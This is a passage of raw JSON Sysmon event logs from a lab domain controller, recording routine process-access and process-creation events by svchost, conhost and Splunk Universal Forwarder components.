07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.832\r\nSourceProcessGUID: {41C8662E-20F0-5F25-0000-0010ED4B0900}\r\nSourceProcessId: 5036\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.832","SourceProcessGUID":"{41C8662E-20F0-5F25-0000-0010ED4B0900}","SourceProcessId":"5036","SourceThreadId":"4936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nProcessGuid: {41C8662E-20F1-5F25-0000-0010184E0900}\r\nProcessId: 4676\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","ProcessGuid":"{41C8662E-20F1-5F25-0000-0010184E0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20F1-5F25-0000-0010184E0900}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 